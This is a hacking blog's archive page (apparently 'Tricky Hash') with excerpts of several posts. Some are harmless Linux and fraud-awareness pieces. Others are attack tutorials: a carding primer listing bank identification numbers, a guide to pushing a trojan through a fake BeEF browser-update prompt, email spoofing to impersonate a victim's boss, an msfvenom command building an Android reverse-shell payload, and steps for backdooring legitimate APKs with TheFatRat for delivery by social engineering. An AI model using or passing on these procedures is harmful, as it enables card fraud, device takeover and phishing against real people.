Skip to main content

Posts

Showing posts from September, 2020

CARDING!(BASICS,PROCEDURES,PRECAUTIONS,CONSEQUENCES)

part-1  * Why does the bank card number have #16 digits and what do these number s mean? * * 16 digits * on the card contains important information and * 6 digits * The first is the bank identification number and specifies which bank issued the card.  By examining these * 6 digits *, programmers will recognize the card issuing bank. "Brought to you by the Dark Army. * (Bank Identification Number) *   they say.  This number for some banks is as follows: Bank name Bank                       Bank Code      ----                       --------- Chemical Bank                    1263 Marine Midland                   6207 [1207?] Manufacturers Hanover Trust      1033 Citibank                         1035 Huntington                       1226 First Card Gold                  1286   MBNA                             6017 Chase Manhatten                  1665 [ Bank from 5127 ]               1015 Capital Bank.                       6396 Future Bank.                         6362 City Bank.   

CROSS SITE SCRIPTING(XSS)|ETHICAL HACKING|

  Cross Site Scripting (XSS)  What is cross site scripting? XSS is a vulnerability that allows an attacker to inject javascript code into a page. So javascript is a programing language and using this vulnerability an attacker would be able to execute a code written in javascript into a website. It is a client-side language so when the code is executed it will be executed on the user but not on the server T ypes of XSS vulnerability Persistent/Stored XSS Reflected XSS DOM based XSS The Stored XSS will be stored in the database. So the code you injected will be stored into the database or into the page so every time any user visits that page the code will be executed  Reflected XSS will be executed only when the target user runs a specific URL written by you  The DOM based this code will be interpreted and run on the client-side without interacting with the webserver these are dangerous because web servers apply some sort of security and filtration to check XSS Discovering XSS So let

Hacking MAC OS X with BeEF|BeEF framework|Tricky Hash

 Hacking MAC OS X Hi everyone  BeEF is a very useful tool and very user-friendly now we are going to use this tool to hacks MAC OS in an easy method first thing you need to do is to send the BeEF hooking link to the victim by using your social-engineering skills and make sure to open the link.  Now he will be hooked with your beEF framework. After getting hooked with the victim click on his IP to see his system details. Now go to the commands sections followed by the Social- engineering section to list out various attacks now go to the Fake Notification Bar you will find three options in it for three different browsers to find out which browser does your victim use go to details and make sure and choose related attack now let's take firefox as an example and let's create a fake update prompt in the browser of the victim choose the option and enter the plugin URL (Trojan) embedded with plug-in and enter notification text to be displayed in the browser and press on execute.  Now

What are Phases of Hacking ?

PHASES OF HACKING Phases of Hacking:- There are mainly 5 phases in hacking. Not necessarily a hacker has to follow these 5 steps in a sequential manner. It’s a step wise process and when followed yields a better result. 1.Reconnaissance 2.Scanning 3.Gaining Access 4.Maintaining Access 5.Clearing Track Now i will explain each of the phases clearly !! 1. Reconnaissance: This is the first step of Hacking. It is also called as Footprinting and information gathering Phase. This is the preparatory phase where we collect as much information as possible about the target. We usually collect information about three groups,        Network Host People Involved There are two types of Footprinting: Active: Directly interacting with the target to gather information about the target. Eg: Using Nmap tool to scan the target Passive: Trying to collect the information about the target without directly accessing the target. This involves collecting information from social media, public websites etc.   2. S

Simplyfying | apt-get | in Linux

When you start with any Linux Distribution, like Ubuntu, Kali Linux and such, it is required to make yourself aware about " apt-get " command.  As " apt " stands "Advance Package Tools". This command is very handy and makes easy to handle packages in Linux. This command is basically used for installing, update and upgrade your packages etc. Let's study few important features of apt-get: • | apt-get install | :  This command is used to install any software packages in Linux Operating System. Refer the syntax below: { sudo apt-get install "software name" }  • | apt-get update | :  This command is initiated to update packages. Refer the syntax below: { sudo apt-get update } to update packages. { sudo apt-get update "package-name" } to update particular package. This command will make you see three lines in terminal: hit, ign and get. ✓ hit : This reflection in terminal means there is no change made in package version. ✓ ign : This re

Linux for Beginners | Tricky Hash

Linux Operating System is the best known, free and open source operating system. Linux is broadly used in operations of server based machines, security tools and number of such categories. Fedora, Cent OS, Ubuntu, Debian are one of the famous flavours from Linux family. If you are looking to experience Linux Operating System, then it is highly recommended to make yourself aware regarding few important commands.  There are generally two types of user in Linux, Regular User who celebrates limited access and Root User who celebrates complete access. Let's see few master terms and commands every beginners should know in Linux OS: • Root User : Root User in Linux celebrates access on all the commands and files. • man : This "man" command provides complete manual of any command. For example: "man passwd" • locate : This "locate" command helps user to find the files by name. • ls : This "ls" command helps to list the table. • pwd : PWD here stands

5 Digital Payment Frauds | Cybersecurity

DIGITAL PAYMENT FRAUDS Frauds  are the unwanted byproducts of  digital payments  which we must minimize and eliminate completely as soon as possible. Especially with the COVID-19 era where we all are dependent on  digital payments , the space of  digital payments  must be made safe for both customers and merchants. 1. Request Money Fraud : Fraudsters misuse the request feature on UPI by sending fake payments requests with message like "Enter your UPI PIN  to receive your money, " Payment successful receive Rs.xxx  "etc. Remember, You need to enter PIN only for sending Money. REQUEST MONEY FRAUD     Prevention : Do not pay or enter your UPI pin to receive money. Don't be greedy!! 2. QR code Fraud : Fraudsters  share a QR code over WhatsApp or over any other Social media asking for the code to be scanned to receive money in their  account.   This QR code, a feature in some UPI apps, is in fact a collect request and scanning and entering your pin is acceding to their

EMAIL SPOOFING

  Email  Spoofing Intro:- This is a very handy method and it comes pre-installed in Kali Linux and all you need to do is to create an SMTP server to send emails. This is very useful and can use the server free of cost or if you are interested you can upgrade it to premium but I prefer the free version of it. By this method, you can send an email to your friend by using his own mail.id. SO, let's Dive in  Requirements:- Kali Linux SMTP server Mail.ID of victim Mail.ID of the victim's boss or friends Procedure:- create an SMTP server by using Sendinblue.com  it's free of cost and used by many marketers.  sign-in page of Sendinblie.com After creating an account successfully enter your details like company name, address, No-of employees, etc but do not forget to give your original phone number because it sends an OTP.   So, after finishing all the required formalities and finish setting up now go to the transactional section and check your SMTP server, port, username, and passw

HOW TO HACK ANDROID USING PAYLOAD

  CREATING A PAYLOAD USING METASPLOIT Hey guys!! Today, I am gonna explain you how to create a Payload using Kali Linux Terminal. In this tutorial, we are going to use the best and wellknown framework. I hope you guess it, Yes! that is   Metasploit Framework. It is one of the best framework among all the frameworks. What is Metasploit Framework ? The  Metasploit Framework  is an open source penetration testing and development platform that provides exploits for a variety of applications, operating systems and platforms.  Metasploit  is one of the most commonly used penetration testing tools and comes built-in to  Kali Linux .       Requirements: 1. Pc with Kali Linux installed in it.    Lets get started: 1. Now open your Kali Linux Terminal ! 2. Use the following Command to create a payload using Metasploit:      sudo msfvenom -p android/meterpreter/reverse_tcp                        LHOST=157.46.254.10 LPORT=4444 R>payload.apk        (There is no new line in this command)   Here: -

Embed Backdoor in any Android app | Android Hacking | Tricky Hash |

  H OW TO  CREATE A ANDROID TROJAN INTRO Everybody  install and use apps these days. So, the easiest way to hack a android by embed a Backdoor to a normal apk File. Now, install this apk file in your Victim's phone by using some Social Engineering trick.  When it is executed the user will see a normal app but in the same time our Backdoor will be running in the Background. REQUIREMENTS A Legitimate android apk file. Kali Linux  The FATRAT (Linux Tool) PROCEDURE   To embed Backdoor in any legitimate apk, we use fatrat. We have to install Fatrat in out terminal. Fatrat is used to generate local or remote listeners. It can generate payloads in various formats.  To Install Fatrat we'll have to use the following commands:  git clone  https://github.com/Screetsec/TheFatRat.git After cloning into TheFatRat now type: ls (enter) cd TheFatRat (enter) ls (enter) chmod +x setup.sh (enter) ls (enter) ./setup.sh (enter) It will automatically install all the required dependencies please be pa